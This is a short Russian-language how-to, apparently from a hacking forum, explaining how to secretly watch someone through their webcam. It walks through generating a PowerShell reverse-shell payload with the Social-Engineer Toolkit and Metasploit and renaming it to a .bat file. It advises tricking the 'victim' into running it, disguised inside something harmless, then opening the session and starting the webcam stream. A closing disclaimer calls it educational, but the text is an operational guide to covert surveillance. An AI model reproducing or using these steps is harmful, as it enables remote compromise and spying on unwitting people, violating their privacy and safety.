Весь собранный материал предназначен для ознакомления и анализа, без цели кому-либо навредить.
Собственно как получить доступ к вебкамере.
Открываем терминал.
Запускаем утилиту SE Toolkit командой setoolkit
Из списка нас будет интересовать первое.
Следственно, прописываем "1".
Видим ещё один список. Здесь выбираем Powershell Attack Vectors.
Пишем "9".
Теперь ищем Powershell Alphanumeric Shell Injector.
Прописываем "1".
Вводим ваш IP Adress, порт оставляем таким же.
Запустился Metasploit, и создался текстовый документ по адресу:
root/.set/reports/powershell под именем x86_powershell_injection.txt.
Копируем этот файл куда вам угодно, переименовываем .txt на .bat.
Теперь все что вам осталось использовать свои умения СИ для того, чтобы жертва открыла батник.
Заставьте жертву запустить ваш батник под любым предлогом. Рекомендую зашить его во что-нибудь безобидное.
После того как жертва запустит файл.
Прописываем session -i. Откроется список сессий
Выбираем, в нашем случае сессию 1 командой session -i 1
Пишем команду help и получаем список команд, где собственно и находиться все самое интересное, в том числе например и Webcam Commands.Набираем команду Webcam_Stream.
Если вы все правильно сделали, то у вас начнется трансляция с веб-камеры жертвы.
P.S. Сейчас в Kali 2020.1 убрали root по стандарту поэтому для того, чтобы получить root кто не знает нужно прописать следующее
sudo su
passwd root
теперь логиньтесь под рутом как раньше после рестарта.